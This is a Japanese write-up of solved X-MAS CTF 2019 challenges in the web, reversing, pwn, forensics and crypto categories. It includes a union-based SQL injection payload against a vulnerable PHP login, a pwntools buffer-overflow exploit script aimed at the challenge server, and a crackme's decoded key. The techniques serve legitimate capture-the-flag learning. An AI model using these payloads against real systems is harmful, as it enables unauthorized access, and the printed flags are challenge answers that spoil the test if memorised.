この大会は2019/12/14 4:00(JST)~2019/12/21 4:00(JST)に開催されました。
今回もチームで参戦。結果は156点で1744チーム中480位でした。
自分で解けた問題をWriteupとして書いておきます。
Merry Christmas! (!Sanity Checks)
白文字でフラグが書いてある。
X-MAS{HoHoHo__W3lc0me_T0_X-MAS_CTF_2019!}
Santa's Secret Club (!Sanity Checks)
Discordに入り、#generalチャネルのトピックを見ると、フラグが書いてある。
Merry Christmas! X-MAS CTF Starts on 13th of december
X-MAS{J0in_S4nt4's_Secr3t_Club__W3_h4ve_cooki3s}
X-MAS{J0in_S4nt4's_Secr3t_Club__W3_h4ve_cooki3s}
Sequel Fun (Web Exploitation)
HTMLソースを見ると、こんなコメントがある。
<!-- ?source=1 -->
http://challs.xmas.htsp.ro:11006/?source=1にアクセスする。
<?php if (isset ($_GET['source'])) { show_source ("index.php"); die (); } ?> <head> <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <div class="container"> <?php include ("config.php"); if (isset ($_GET['user']) && isset ($_GET['pass'])) { $user = $_GET['user']; $pass = $_GET['pass']; if (strpos ($user, '1') === false && strpos ($pass, '1') === false) { $conn = new mysqli ($servername, $username, $password, $dbname); $result = mysqli_query ($conn, "SELECT * FROM users WHERE user='" . $user . "' AND pass='" . $pass . "'", MYSQLI_STORE_RESULT); // TO-DO: Remove elf:elf account if ($result === false) { echo "<b>Our servers have run into a query error. Please try again later.</b>"; } else { if ($result->num_rows !== 0) { $row = mysqli_fetch_array ($result, MYSQLI_ASSOC); echo "<h1>You are logged in as: " . $row["user"] . "</h1><br>"; echo "<b class='flag'>"; if ($row ["uid"] === "0") echo $flag; else echo "Welcome elf!"; echo "</b>"; } else { echo "<b>Login fail.</b>"; } } } else { echo "<b>I don't like the number 1 :(</b>"; } } else { echo '<form class="center"> <h1>Santa Login:</h1> <label>Username:</label> <input type="text" name="user" autocomplete="off"><br> <label>Password:</label> <input type="password" name="pass" autocomplete="off"><br> <input type="submit" value="Connect"> </form>'; } ?> </div> <br> <script src="/js/snow.js"></script> <!-- ?source=1 --> </body>
このソースコードから、以下の条件を満たすと、フラグが表示されるはず。
・userもpassも"1"が含まれない。 ・uidが0
この条件を満たすように、以下を入力してログインしたらフラグが表示された。
user: a pass: a' union select 0, 'admin', 'pass
X-MAS{S0_1_c4n_b3_4dmin_w1th0ut_7h3_p4ssw0rd?}
Santa's crackme (Reverse Engineering)
Ghidraでデコンパイルする。
undefined8 main(void) { uint uVar1; byte local_7a; undefined local_79; byte local_78 [104]; int local_10; uint local_c; printf("Enter your license key: "); __isoc99_scanf("%100s",local_78); local_c = 0; local_10 = 0; while (local_78[(long)local_10] != 0) { local_7a = local_78[(long)local_10] ^ 3; local_79 = 0; uVar1 = strcmp((char *)&local_7a,flag_matrix + (long)local_10 * 2); local_c = local_c | uVar1; local_10 = local_10 + 1; } if (local_c == 0) { puts("License key is correct"); } else { puts("License key is incorrect"); } return 0; }
flag_matrixはこのようになっている。
flag_matrix XREF[2]: Entry Point(*), main:004011af(*)
00404060 5b 00 2e undefine
00 4e 00
42 00 50
00404060 5b undefined15Bh [0] XREF[2]: Entry Point(*), main:004011af(*)
00404061 00 undefined100h [1]
00404062 2e undefined12Eh [2]
00404063 00 undefined100h [3]
00404064 4e undefined14Eh [4]
00404065 00 undefined100h [5]
00404066 42 undefined142h [6]
00404067 00 undefined100h [7]
00404068 50 undefined150h [8]
00404069 00 undefined100h [9]
0040406a 78 undefined178h [10]
0040406b 00 undefined100h [11]
0040406c 36 undefined136h [12]
0040406d 00 undefined100h [13]
0040406e 37 undefined137h [14]
0040406f 00 undefined100h [15]
00404070 6d undefined16Dh [16]
00404071 00 undefined100h [17]
00404072 34 undefined134h [18]
00404073 00 undefined100h [19]
00404074 37 undefined137h [20]
00404075 00 undefined100h [21]
00404076 5c undefined15Ch [22]
00404077 00 undefined100h [23]
00404078 32 undefined132h [24]
00404079 00 undefined100h [25]
0040407a 36 undefined136h [26]
0040407b 00 undefined100h [27]
0040407c 5c undefined15Ch [28]
0040407d 00 undefined100h [29]
0040407e 61 undefined161h [30]
0040407f 00 undefined100h [31]
00404080 37 undefined137h [32]
00404081 00 undefined100h [33]
00404082 67 undefined167h [34]
00404083 00 undefined100h [35]
00404084 5c undefined15Ch [36]
00404085 00 undefined100h [37]
00404086 37 undefined137h [38]
00404087 00 undefined100h [39]
00404088 34 undefined134h [40]
00404089 00 undefined100h [41]
0040408a 5c undefined15Ch [42]
0040408b 00 undefined100h [43]
0040408c 6f undefined16Fh [44]
0040408d 00 undefined100h [45]
0040408e 32 undefined132h [46]
0040408f 00 undefined100h [47]
00404090 60 undefined160h [48]
00404091 00 undefined100h [49]
00404092 30 undefined130h [50]
00404093 00 undefined100h [51]
00404094 6d undefined16Dh [52]
00404095 00 undefined100h [53]
00404096 36 undefined136h [54]
00404097 00 undefined100h [55]
00404098 30 undefined130h [56]
00404099 00 undefined100h [57]
0040409a 5c undefined15Ch [58]
0040409b 00 undefined100h [59]
0040409c 60 undefined160h [60]
0040409d 00 undefined100h [61]
0040409e 6b undefined16Bh [62]
0040409f 00 undefined100h [63]
004040a0 30 undefined130h [64]
004040a1 00 undefined100h [65]
004040a2 60 undefined160h [66]
004040a3 00 undefined100h [67]
004040a4 68 undefined168h [68]
004040a5 00 undefined100h [69]
004040a6 32 undefined132h [70]
004040a7 00 undefined100h [71]
004040a8 6d undefined16Dh [72]
004040a9 00 undefined100h [73]
004040aa 35 undefined135h [74]
004040ab 00 undefined100h [75]
004040ac 7e undefined17Eh [76]
004040ad 00 undefined100h [77]flag_matrix を1バイト飛ばしで、3とのXORを取ればよい。
flag_matrix = [0x5b, 0x2e, 0x4e, 0x42, 0x50, 0x78, 0x36, 0x37, 0x6d, 0x34, 0x37, 0x5c, 0x32, 0x36, 0x5c, 0x61, 0x37, 0x67, 0x5c, 0x37, 0x34, 0x5c, 0x6f, 0x32, 0x60, 0x30, 0x6d, 0x36, 0x30, 0x5c, 0x60, 0x6b, 0x30, 0x60, 0x68, 0x32, 0x6d, 0x35, 0x7e] flag = '' for code in flag_matrix: flag += chr(code ^ 3) print flag
X-MAS{54n74_15_b4d_47_l1c3n53_ch3ck1n6}
SN0WVERFL0W (Binary Exploitation)
Ghidraでデコンパイルする。
undefined8 FUN_00401167(void) { int iVar1; char local_12 [10]; setvbuf(stdin,(char *)0x0,2,0); setvbuf(stdout,(char *)0x0,2,0); puts("Helloooooo, do you like to build snowmen?"); read(0,local_12,100); iVar1 = strcmp(local_12,"yes"); if (iVar1 == 0) { puts("Me too! Let\'s build one!"); } else { puts("Mhmmm... Boring..."); } return 0; } void FUN_00401156(void) { puts("X-MAS{REAL FLAG ON THE SERVER}"); return; }
bofの脆弱性があるので、それを使ってFUN_00401156を呼び出せればよい。
$ gdb -q chall Reading symbols from chall...(no debugging symbols found)...done. gdb-peda$ r Starting program: /mnt/hgfs/Shared/chall Helloooooo, do you like to build snowmen? AAAAAAAA Mhmmm... Boring... [Inferior 1 (process 9682) exited normally] gdb-peda$ r Starting program: /mnt/hgfs/Shared/chall Helloooooo, do you like to build snowmen? AAAAAAAAAAAA Mhmmm... Boring... [Inferior 1 (process 9686) exited normally] gdb-peda$ r Starting program: /mnt/hgfs/Shared/chall Helloooooo, do you like to build snowmen? AAAAAAAAAAAAAAAA Mhmmm... Boring... [Inferior 1 (process 9687) exited normally] gdb-peda$ r Starting program: /mnt/hgfs/Shared/chall Helloooooo, do you like to build snowmen? AAAAAAAAAAAAAAAAAAAA Mhmmm... Boring... Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x0 RCX: 0x7ffff7b042c0 (<__write_nocancel+7>: cmp rax,0xfffffffffffff001) RDX: 0x7ffff7dd3780 --> 0x0 RSI: 0x7ffff7dd26a3 --> 0xdd3780000000000a RDI: 0x1 RBP: 0x4141414141414141 (b'AAAAAAAA') RSP: 0x7fffffffdca0 --> 0x1 RIP: 0x7ffff70a4141 R8 : 0x7ffff7fda700 (0x00007ffff7fda700) R9 : 0x0 R10: 0x838 R11: 0x246 R12: 0x401070 (repz nop edx) R13: 0x7fffffffdd70 --> 0x1 R14: 0x0 R15: 0x0 [-------------------------------------code-------------------------------------] Invalid $PC address: 0x7ffff70a4141 [------------------------------------stack-------------------------------------] Display various information of current execution context Usage: context [reg,code,stack,all] [code/stack length] 0x00007ffff70a4141 in ?? ()
0x401156を18バイト目から送り込めばよい。
from pwn import * #p = process('./chall') p = remote('challs.xmas.htsp.ro', 12006) ret = p.recv() payload = '' payload += 'A' * 18 payload += p64(0x401156) print ret + payload p.sendline(payload) ret = p.recv() print ret
実行結果は以下の通り。
[+] Opening connection to challs.xmas.htsp.ro on port 12006: Done
Helloooooo, do you like to build snowmen?AAAAAAAAAAAAAAAAAAV\x11\x00\x00\x00
Mhmmm... Boring...
X-MAS{700_much_5n0000w}
[*] Closed connection to challs.xmas.htsp.ro port 12006
X-MAS{700_much_5n0000w}
Santa's Forensics 101 (Forensics)
$ file X-MAS_Flag2.png X-MAS_Flag2.png: Zip archive data, at least v2.0 to extract $ mv X-MAS_Flag2.png X-MAS_Flag2.zip $ unzip X-MAS_Flag2.zip Archive: X-MAS_Flag2.zip warning [X-MAS_Flag2.zip]: 308188 extra bytes at beginning or within zipfile (attempting to process anyway) creating: hidden_data_dt/ inflating: hidden_data_dt/logo2.png $ strings hidden_data_dt/logo2.png | grep X-MAS X-MAS{W3lc0m3_t0_th3_N0rth_Pol3}
X-MAS{W3lc0m3_t0_th3_N0rth_Pol3}
Mata Nui's Cookies (Crypto)
換字式暗号。Mata Nui cipherで調べると、対応表が見つかった。
対応表に従って、変換する。
X-MASMATANUIHASPREPAREDTHECOOKIES
X-MAS{MATANUIHASPREPAREDTHECOOKIES}
